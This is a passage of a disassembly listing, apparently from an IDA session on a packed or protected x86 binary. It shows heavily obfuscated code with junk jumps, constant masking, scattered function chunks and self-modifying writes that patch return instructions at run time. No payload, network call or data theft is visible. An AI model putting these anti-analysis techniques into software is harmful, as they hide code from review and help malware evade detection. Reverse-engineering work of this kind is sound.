jnz loc_4540B9
jmp loc_44E5B6
; ---------------------------------------------------------------------------
locret_458A66: ; CODE XREF: ut7h7i2x:004581B3j
retn
; ---------------------------------------------------------------------------
loc_458A67: ; CODE XREF: ut7h7i2x:00450A43j
jmp loc_451DD3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449217
loc_458A6C: ; CODE XREF: sub_449217-1A57j
jmp loc_4461C7
; END OF FUNCTION CHUNK FOR sub_449217
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_165. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_458A72: ; CODE XREF: sub_43EF73+2CE1j
jmp loc_45778D
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B83C
loc_458A77: ; CODE XREF: sub_43B83C+1C3B4j
pop edi
mov eax, ds:dword_44373C
or eax, eax
jnz loc_4552B9
jmp loc_459C62
; END OF FUNCTION CHUNK FOR sub_43B83C
; ---------------------------------------------------------------------------
loc_458A8B: ; CODE XREF: ut7h7i2x:0045AC88j
jp loc_44507C
xchg edi, eax
adc edi, ecx
; START OF FUNCTION CHUNK FOR sub_4394DC
loc_458A95: ; CODE XREF: sub_4394DC+10j
add edx, 0DEE2AC6Ah
xchg edx, [esp-4+arg_0]
jmp loc_454E2B
; END OF FUNCTION CHUNK FOR sub_4394DC
; ---------------------------------------------------------------------------
loc_458AA3: ; CODE XREF: ut7h7i2x:loc_44BA8Dj
add eax, ebp
or eax, edi
jmp loc_44DE6B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449DC4
loc_458AAC: ; CODE XREF: sub_449DC4-35FEj
adc esi, 0E0C6601Eh
sub esi, eax
loc_458AB4: ; CODE XREF: sub_449DC4:loc_44E21Dj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_452EF6
jmp loc_45700E
; END OF FUNCTION CHUNK FOR sub_449DC4
; ---------------------------------------------------------------------------
cdq
jmp sub_459A90
; ---------------------------------------------------------------------------
loc_458ACB: ; DATA XREF: sub_442B3B+F093o
add eax, ebp
push esi
push 9A1F5A0Ah
pop esi
rol esi, 1Eh
jmp loc_446791
; ---------------------------------------------------------------------------
loc_458ADC: ; CODE XREF: ut7h7i2x:00448822j
call sub_43AA94
mov ds:off_41D078, eax
lea eax, sub_449C6F
mov byte ptr [eax], 0C3h
jmp loc_43D0A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449C6F
loc_458AF5: ; CODE XREF: sub_449C6F:loc_445025j
mov eax, [esp+8+var_8]
jmp loc_44757D
; END OF FUNCTION CHUNK FOR sub_449C6F
; =============== S U B R O U T I N E =======================================
sub_458AFD proc near ; DATA XREF: ut7h7i2x:0043D32Eo
add eax, 0CA5ED997h
mov eax, [eax]
push offset sub_43FBB6
jmp nullsub_527
sub_458AFD endp
; ---------------------------------------------------------------------------
loc_458B0F: ; CODE XREF: ut7h7i2x:0043955Aj
adc edi, esi
add edx, 7E4AA964h
sub ebx, esi
mov eax, esi
jmp loc_453CF5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_458B20: ; CODE XREF: sub_4529E0-9780j
jno loc_4574F8
loc_458B26: ; CODE XREF: sub_4529E0:loc_450D2Fj
add eax, 0C83AFA9h
loc_458B2C: ; CODE XREF: ut7h7i2x:loc_44BE9Fj
call sub_43F058
push 3589FD1Dh
xchg esi, [esp+0]
mov eax, esi
jmp loc_4461DB
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
pushf
mov [ecx], ebp
jmp loc_43F53D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_468. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FFB1
loc_458B49: ; CODE XREF: sub_43FFB1+10483j
jmp loc_45842B
; END OF FUNCTION CHUNK FOR sub_43FFB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_458B4E: ; CODE XREF: sub_445FA9-3C74j
jmp loc_455E1B
; END OF FUNCTION CHUNK FOR sub_445FA9
; =============== S U B R O U T I N E =======================================
sub_458B53 proc near ; DATA XREF: ut7h7i2x:00450CC5o
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043E392 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440B27 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044EEC7 SIZE 00000014 BYTES
mov edx, [esp+0]
push eax
mov eax, edx
push edx
loc_458B5A: ; CODE XREF: ut7h7i2x:loc_442980j
jmp loc_440B27
sub_458B53 endp
; ---------------------------------------------------------------------------
loc_458B5F: ; CODE XREF: ut7h7i2x:004544E1j
cmp eax, 23CBC91Eh
jmp loc_439EBC
; ---------------------------------------------------------------------------
and ebx, esi
jmp sub_43CD4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A070
loc_458B71: ; CODE XREF: sub_45A070-20105j
jnb loc_444BFA
cmp ecx, ebx
jmp loc_4472CE
; END OF FUNCTION CHUNK FOR sub_45A070
; ---------------------------------------------------------------------------
add ebp, ebx
pop ebx
jmp sub_45413B
; ---------------------------------------------------------------------------
xchg ecx, [esi]
jmp loc_4424E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1D2
loc_458B8D: ; CODE XREF: sub_43C1D2:loc_452A0Fj
; sub_44B5CF+745Aj
xor ecx, 0C96498E4h
and ecx, 98B6F98Bh
add ecx, 778E7FAFh
popf
jmp loc_451F19
; END OF FUNCTION CHUNK FOR sub_43C1D2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_184. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_458BA6: ; CODE XREF: ut7h7i2x:00456420j
jmp sub_4471CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_458BAB: ; CODE XREF: sub_442B3B+F098j
jmp nullsub_351
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
loc_458BB0: ; CODE XREF: ut7h7i2x:0044BC76j
jmp loc_446EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449C6F
loc_458BB5: ; CODE XREF: sub_449C6F:loc_44C190j
mov edx, edi
pop edi
rol edx, 18h
sub edx, 9B3DD04Ah
call sub_444A86
loc_458BC6: ; CODE XREF: sub_4583E7+1F71j
jmp loc_44C0FA
; END OF FUNCTION CHUNK FOR sub_449C6F
; ---------------------------------------------------------------------------
loc_458BCB: ; CODE XREF: ut7h7i2x:00446436j
jmp loc_444369
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_458BD0: ; CODE XREF: sub_43A556+6C35j
jmp nullsub_424
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_458BD5: ; CODE XREF: ut7h7i2x:0044FFECj
jnb loc_4579F9
; =============== S U B R O U T I N E =======================================
sub_458BDB proc near ; CODE XREF: ut7h7i2x:004536CAp
; ut7h7i2x:loc_45A5A4j
xchg ecx, [esp+0]
pop ecx
lea eax, sub_44682E
mov byte ptr [eax], 0C3h
jmp sub_44682E
sub_458BDB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_458BED proc near ; CODE XREF: sub_44DB48:loc_448151j
push ebp
mov ebp, eax
push offset loc_4581AA
loc_458BF5: ; CODE XREF: ut7h7i2x:00441E8Bj
jmp nullsub_352
sub_458BED endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_458BFA: ; CODE XREF: sub_439BF8+C41j
push edx
call sub_4406F1
loc_458C00: ; DATA XREF: sub_44C5D9:loc_43D9C8o
jz loc_44920C
mov eax, [ebp-4]
cmp byte ptr [eax], 0E9h
jz loc_44920C
mov eax, [ebp-4]
jmp loc_453CC4
; END OF FUNCTION CHUNK FOR sub_439BF8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_98. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C99C
loc_458C1B: ; CODE XREF: sub_44C99C+514Ej
; ut7h7i2x:loc_458199j
jmp loc_4501A2
; END OF FUNCTION CHUNK FOR sub_44C99C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_458C20: ; CODE XREF: sub_44BF76+1995j
jmp loc_43E460
; END OF FUNCTION CHUNK FOR sub_44BF76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_458C25: ; CODE XREF: sub_43A556+E592j
jmp loc_43D673
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FE13
loc_458C2A: ; CODE XREF: sub_43FE13+Cj
jmp nullsub_353
; END OF FUNCTION CHUNK FOR sub_43FE13
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_313. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_458C30: ; CODE XREF: sub_43CE34:loc_446137j
; sub_43CCC3:loc_44AABDj
add eax, ebp
call sub_44D759
; END OF FUNCTION CHUNK FOR sub_43CCC3
; START OF FUNCTION CHUNK FOR sub_44941C
loc_458C37: ; CODE XREF: sub_44941C-D4DEj
; sub_457541-132ECj
rol eax, 8
push eax
push edi
push 76880C50h
pop edi
rol edi, 7
sub edi, ds:4000F9h
and edi, 328A69Ch
jmp near ptr aZL_zLq_SB+0Dh
; END OF FUNCTION CHUNK FOR sub_44941C
; ---------------------------------------------------------------------------
mov [ebp+0], edi
jmp loc_43B6FA
; ---------------------------------------------------------------------------
loc_458C5E: ; CODE XREF: ut7h7i2x:0045916Aj
mov ebx, edx
loc_458C60: ; CODE XREF: ut7h7i2x:loc_44F784j
lea eax, [ebp-12Dh]
call sub_449DFF
; START OF FUNCTION CHUNK FOR sub_446599
loc_458C6B: ; CODE XREF: sub_446599-7A3Ej
jmp loc_445B5F
; END OF FUNCTION CHUNK FOR sub_446599
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_84. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B0A8
loc_458C71: ; CODE XREF: sub_43B0A8+6j
jmp nullsub_354
; END OF FUNCTION CHUNK FOR sub_43B0A8
; ---------------------------------------------------------------------------
loc_458C76: ; CODE XREF: ut7h7i2x:004561C0j
push edi
; START OF FUNCTION CHUNK FOR sub_442AD1
loc_458C77: ; CODE XREF: sub_442AD1:loc_44F8D6j
add edx, 2949AB4Ah
xchg edx, [esp+4+var_4]
jmp loc_43F63C
; END OF FUNCTION CHUNK FOR sub_442AD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44124A
loc_458C85: ; CODE XREF: sub_44124A+B087j
jb loc_44BE72
loc_458C8B: ; CODE XREF: sub_44124A:loc_45370Ej
push offset loc_43AB26
jmp loc_45290F
; END OF FUNCTION CHUNK FOR sub_44124A
; =============== S U B R O U T I N E =======================================
sub_458C95 proc near ; CODE XREF: ut7h7i2x:0044027Ej
; ut7h7i2x:00452F19p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043FF8A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044784F SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
xchg esi, [esp+0]
push edx
mov edx, ebp
jmp loc_44784F
sub_458C95 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_458CA4 proc near ; CODE XREF: ut7h7i2x:00443E83j
; sub_45173A+6p
; FUNCTION CHUNK AT 00442FB2 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00443169 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044676F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A9F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BF62 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044D8B1 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00458755 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
mov ebp, esp
push edi
mov edi, ecx
xchg edi, [esp+0]
mov [ebp-4], eax
mov eax, [ebp-4]
jmp loc_44A9F9
sub_458CA4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_458CBB proc near ; DATA XREF: sub_4576A2-166F4o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044549C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446241 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044A96C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DAD7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450A84 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00451E4D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00453874 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00457B99 SIZE 00000015 BYTES
mov ebp, esp
loc_458CBD: ; CODE XREF: ut7h7i2x:0043FA28j
push ecx
mov [ebp+var_4], eax
push 6F44DCBAh
pop eax
sub eax, 32ECFA0Ah
jmp loc_44DAD7
sub_458CBB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_458CD2 proc near ; CODE XREF: ut7h7i2x:0044CA5Cj
; sub_4402A5:loc_455480p
; FUNCTION CHUNK AT 00441388 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00444C5F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004508EC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045647D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00457D71 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004583D5 SIZE 00000010 BYTES
xchg edx, [esp+0]
pop edx
mov eax, 0E1h
push ecx
mov ecx, eax
xchg ecx, [esp+0]
push 0EC3C19FBh
jmp loc_441388
sub_458CD2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_458CEB: ; CODE XREF: sub_446320:loc_443784j
or eax, eax
jnz loc_44C52C
jmp loc_43DDC9
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
loc_458CF8: ; CODE XREF: ut7h7i2x:0044A81Cj
jnz loc_447454
; START OF FUNCTION CHUNK FOR sub_4583E7
loc_458CFE: ; CODE XREF: sub_4583E7-1748Cj
jmp loc_44A385
; END OF FUNCTION CHUNK FOR sub_4583E7
; ---------------------------------------------------------------------------
ror ecx, 4
jmp loc_447453
; ---------------------------------------------------------------------------
loc_458D0B: ; CODE XREF: ut7h7i2x:00453ACEj
add esi, 441C9098h
cmp edx, 2FC0EC13h
jmp loc_43CA0C
; ---------------------------------------------------------------------------
call sub_453D8B
call sub_447D5B
; START OF FUNCTION CHUNK FOR sub_44D807
loc_458D26: ; CODE XREF: sub_44D807+32j
jmp loc_454E5A
; END OF FUNCTION CHUNK FOR sub_44D807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_458D2B: ; CODE XREF: sub_4442CC+5C00j
jmp loc_439B98
; END OF FUNCTION CHUNK FOR sub_4442CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_458D30: ; CODE XREF: sub_43AED9:loc_446BB0j
and esi, edi
jmp loc_458FD5
; END OF FUNCTION CHUNK FOR sub_43AED9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449B8E
loc_458D37: ; CODE XREF: sub_449B8E:loc_445725j
mov ebp, ebx
jmp loc_453512
; END OF FUNCTION CHUNK FOR sub_449B8E
; ---------------------------------------------------------------------------
loc_458D3E: ; DATA XREF: sub_44715B-AF09o
mov eax, [esp]
push ebx
mov ebx, edx
xchg ebx, [esp]
push ecx
push 7BADA5ABh
jmp loc_44A236
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A907
loc_458D52: ; CODE XREF: sub_45A907-2D8Cj
call sub_449D3B
push 50A072BEh
pop eax
sub eax, 0F8D49CE3h
add eax, 926F17E1h
jmp loc_43CDB0
; END OF FUNCTION CHUNK FOR sub_45A907
; =============== S U B R O U T I N E =======================================
sub_458D6E proc near ; CODE XREF: ut7h7i2x:0043EB66j
; sub_453A91+Cp
xchg ebx, [esp+0]
sub_458D6E endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44445F
loc_458D71: ; CODE XREF: sub_44445F:loc_44A04Cj
pop ebx
push edx
loc_458D73: ; CODE XREF: sub_43F1B2:loc_442F50j
pop eax
xor ebx, 4A318B9Fh
adc edx, 83BA7595h
push edi
push 307200E8h
jmp loc_44FA22
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E7A
loc_458D8B: ; CODE XREF: sub_459E7A-200F6j
pop edi
loc_458D8C: ; CODE XREF: sub_4459EE-4100j
sub edi, 241BAC2Fh
xor edi, 0BA009BFCh
sub eax, edi
push offset sub_45A25C
jmp loc_443D4A
; END OF FUNCTION CHUNK FOR sub_459E7A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457541
loc_458DA4: ; CODE XREF: sub_457541-B264j
xor esi, 0CE9978E6h
sub ebx, ecx
loc_458DAC: ; CODE XREF: sub_457541:loc_44EA03j
call sub_44B43D
loc_458DB1: ; CODE XREF: ut7h7i2x:0045ABD8j
jmp loc_44B47C
; END OF FUNCTION CHUNK FOR sub_457541
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_458DB6: ; CODE XREF: sub_4524FE-3BC7j
jmp nullsub_28
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
loc_458DBB: ; CODE XREF: ut7h7i2x:0044CA78j
jmp loc_44EE28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7B6
loc_458DC0: ; CODE XREF: sub_43F7B6+8CD4j
jmp nullsub_356
; END OF FUNCTION CHUNK FOR sub_43F7B6
; =============== S U B R O U T I N E =======================================
sub_458DC5 proc near ; DATA XREF: sub_445CC3-74Eo
; FUNCTION CHUNK AT 0044089A SIZE 00000005 BYTES
call sub_44B5CF
push offset sub_43E5D3
jmp loc_44089A
sub_458DC5 endp
; ---------------------------------------------------------------------------
loc_458DD4: ; CODE XREF: ut7h7i2x:0043C9BEj
; ut7h7i2x:0045A2F6j
xchg eax, [esp]
mov edx, eax
push eax
push offset sub_43EFC4
jmp locret_443ED2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451900
loc_458DE4: ; CODE XREF: sub_451900:loc_4478C6j
cdq
pop ebp
mov edx, [ebp+0]
jmp loc_45A5D2
; END OF FUNCTION CHUNK FOR sub_451900
; ---------------------------------------------------------------------------
loc_458DEE: ; CODE XREF: ut7h7i2x:0045A997j
popf
sub ecx, esi
jmp loc_453095
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_458DF6: ; CODE XREF: sub_43F0B0:loc_4489BFj
pushf
cmp edx, esi
jmp loc_44FEC4
; END OF FUNCTION CHUNK FOR sub_43F0B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455461
loc_458DFE: ; CODE XREF: sub_455461:loc_454E30j
call sub_43F69F
; END OF FUNCTION CHUNK FOR sub_455461
; START OF FUNCTION CHUNK FOR sub_4482D0
loc_458E03: ; CODE XREF: sub_4482D0:loc_44AD43j
push edx
call sub_444E04
push 0EC5A25EFh
pop eax
rol eax, 0Ah
add eax, 0FC067413h
push offset loc_441E23
jmp nullsub_357
; END OF FUNCTION CHUNK FOR sub_4482D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB1E
loc_458E22: ; CODE XREF: sub_44DB1E+8j
jns loc_4473A2
add esp, 0FFFFFED0h
mov [ebp+var_C], ecx
mov [ebp+var_6], dx
push ebx
call sub_442987
loc_458E3B: ; CODE XREF: sub_442B3B-37B3j
jmp nullsub_359
; END OF FUNCTION CHUNK FOR sub_44DB1E
; ---------------------------------------------------------------------------
mov eax, 0EEE68DF1h
call sub_43AED9
mov ds:off_41D044, eax
lea eax, loc_447EC6
mov byte ptr [eax], 0C3h
jmp loc_43A453
; =============== S U B R O U T I N E =======================================
sub_458E5E proc near ; CODE XREF: sub_40207D+113p
; sub_458E5E+5j
; DATA XREF: ...
call sub_45A907
jmp ds:off_41D048
sub_458E5E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_458E69: ; CODE XREF: sub_450231+Dj
jmp loc_456890
; END OF FUNCTION CHUNK FOR sub_450231
; ---------------------------------------------------------------------------
loc_458E6E: ; CODE XREF: ut7h7i2x:0044E641j
jmp loc_45A11F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_458E73: ; CODE XREF: sub_453E14-D727j
jmp loc_44EA55
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4446B0
loc_458E78: ; CODE XREF: sub_4446B0+7j
jmp loc_43C31B
; END OF FUNCTION CHUNK FOR sub_4446B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1D2
loc_458E7D: ; CODE XREF: sub_43C1D2+9570j
mov ecx, edx
ror edx, 2
xchg esi, edi
jmp loc_44E2FF
; END OF FUNCTION CHUNK FOR sub_43C1D2
; =============== S U B R O U T I N E =======================================
sub_458E89 proc near ; CODE XREF: sub_4518D7:loc_441FB4p
; ut7h7i2x:00447883j
xchg ecx, [esp+0]
loc_458E8C: ; CODE XREF: ut7h7i2x:loc_451CCDj
pop ecx
add ebx, 14C7638h
call sub_44F069
loc_458E98: ; CODE XREF: ut7h7i2x:004463E6j
jmp nullsub_361
sub_458E89 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_458E9D: ; CODE XREF: ut7h7i2x:00451BE7j
mov [eax], ebx
mov eax, 7F582341h
; START OF FUNCTION CHUNK FOR sub_452C66
loc_458EA4: ; CODE XREF: sub_452C66:loc_451BD8j
add ebx, 3C8FE07Fh
xchg ebx, [esp+4+var_4]
jmp loc_442B2C
; END OF FUNCTION CHUNK FOR sub_452C66
; ---------------------------------------------------------------------------
loc_458EB2: ; CODE XREF: ut7h7i2x:loc_44E4C5j
; ut7h7i2x:0044E4D8j
and edi, 49136E68h
add edi, 0F741F34Ah
popf
xchg edi, [esp]
jmp sub_43AA94
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_425. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_458EC8: ; CODE XREF: ut7h7i2x:00454A6Cj
or esi, 0B4935771h
sub esi, 956D093Dh
add esi, 0D8D303EEh
xchg esi, [esp]
jmp loc_45ACDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454596
loc_458EE2: ; CODE XREF: sub_454596:loc_4472DBj
xchg ebx, [esp+4+var_4]
call sub_448CBC
call sub_44F040
; END OF FUNCTION CHUNK FOR sub_454596
; START OF FUNCTION CHUNK FOR sub_44EC6F
loc_458EEF: ; CODE XREF: sub_44EC6F+Aj
jmp loc_44C1F3
; END OF FUNCTION CHUNK FOR sub_44EC6F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E54
loc_458EF4: ; CODE XREF: sub_459E54-1F977j
jmp loc_444D59
; END OF FUNCTION CHUNK FOR sub_459E54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4558CC
loc_458EF9: ; CODE XREF: sub_4558CC-1A5A2j
xchg esi, [esp+0]
jmp sub_4589FE
; END OF FUNCTION CHUNK FOR sub_4558CC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_544. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4550FF
loc_458F02: ; CODE XREF: sub_4550FF-A836j
jmp loc_4399BD
; END OF FUNCTION CHUNK FOR sub_4550FF
; =============== S U B R O U T I N E =======================================
sub_458F07 proc near ; CODE XREF: sub_43D021+1D04j
; ut7h7i2x:004414AFp
; FUNCTION CHUNK AT 0044D03F SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov byte ptr [eax], 0C3h
jmp loc_44D03F
sub_458F07 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, [esp]
mov edx, eax
call sub_446490
loc_458F1D: ; CODE XREF: ut7h7i2x:00458689j
jmp nullsub_113
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4445DC
loc_458F22: ; CODE XREF: sub_4445DC+3j
jmp loc_43E953
; END OF FUNCTION CHUNK FOR sub_4445DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_458F27: ; CODE XREF: sub_444EAA:loc_457F42j
jz loc_455E45
jmp loc_43FF9A
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_458F32: ; CODE XREF: sub_450FDE-9A0Cj
cdq
loc_458F33: ; CODE XREF: ut7h7i2x:loc_453848j
push 0C7D17181h
pop eax
sub eax, 0B9BA43F5h
jmp loc_43AAC9
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
popf
jmp loc_43BFF6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_120. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_458F4B: ; CODE XREF: sub_453E14+2F46j
jmp loc_448AAF
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
loc_458F50: ; CODE XREF: ut7h7i2x:004525FAj
jmp loc_44A38F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44092D
loc_458F55: ; CODE XREF: sub_44092D+91E4j
jmp loc_43B748
; END OF FUNCTION CHUNK FOR sub_44092D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452CBB
loc_458F5A: ; CODE XREF: sub_452CBB-1F5Ej
pop edx
or edx, 3BCEA779h
test edx, 10h
jmp loc_43C034
; END OF FUNCTION CHUNK FOR sub_452CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_458F6C: ; CODE XREF: sub_439BD1+18EAFj
jbe loc_44B4E3
not edx
; END OF FUNCTION CHUNK FOR sub_439BD1
; START OF FUNCTION CHUNK FOR sub_439788
loc_458F74: ; CODE XREF: sub_439788+1B4DCj
mov ecx, 0A3553296h
loc_458F79: ; CODE XREF: sub_439BD1:loc_440372j
call sub_45500F
jmp loc_440425
; END OF FUNCTION CHUNK FOR sub_439788
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_458F83: ; CODE XREF: sub_43FF65+C5C2j
push eax
push 770FABB0h
pop eax
and eax, 31C35D8Fh
loc_458F90: ; CODE XREF: ut7h7i2x:loc_451D07j
sub eax, 0D03925E9h
add eax, 9F7BC359h
xchg eax, [esp+0Ch+var_C]
jmp loc_43BFE7
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
push eax
ror eax, 16h
mov ds:dword_446648, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453A91
loc_458FAF: ; CODE XREF: sub_453A91:loc_43CD7Aj
; sub_452653+Aj
call sub_4584FE
loc_458FB4: ; CODE XREF: sub_44928D+CB24j
jmp loc_44F740
; END OF FUNCTION CHUNK FOR sub_453A91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450714
loc_458FB9: ; CODE XREF: sub_450714-DF67j
jmp nullsub_368
; END OF FUNCTION CHUNK FOR sub_450714
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_458FBE: ; CODE XREF: sub_43A556:loc_44656Cj
add eax, 9A1C6D0Ch
mov dword ptr [eax], 6C43776Fh
push 0CE406D7Dh
pop eax
jmp loc_44024D
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_458FD5: ; CODE XREF: sub_43AED9+1DE59j
xor edi, eax
; END OF FUNCTION CHUNK FOR sub_43AED9
; START OF FUNCTION CHUNK FOR sub_4573BA
loc_458FD7: ; CODE XREF: sub_4573BA:loc_440BEEj
call sub_4587DD
push 33330E53h
pop edx
jmp loc_455445
; END OF FUNCTION CHUNK FOR sub_4573BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4464B7
loc_458FE7: ; CODE XREF: sub_4464B7:loc_43E57Bj
jnz loc_4442AE
loc_458FED: ; CODE XREF: sub_43A301+Fj
jmp sub_45002D
; END OF FUNCTION CHUNK FOR sub_4464B7
; ---------------------------------------------------------------------------
cmp ebp, 0C9AB151Fh
jmp loc_43D4B0
; ---------------------------------------------------------------------------
loc_458FFD: ; CODE XREF: ut7h7i2x:0044BB48j
test ebp, 942ED513h
jmp loc_45046C
; ---------------------------------------------------------------------------
sub eax, 1B919B2Bh
jmp sub_44825D
; ---------------------------------------------------------------------------
loc_459013: ; CODE XREF: ut7h7i2x:00441642j
jnp loc_44E922
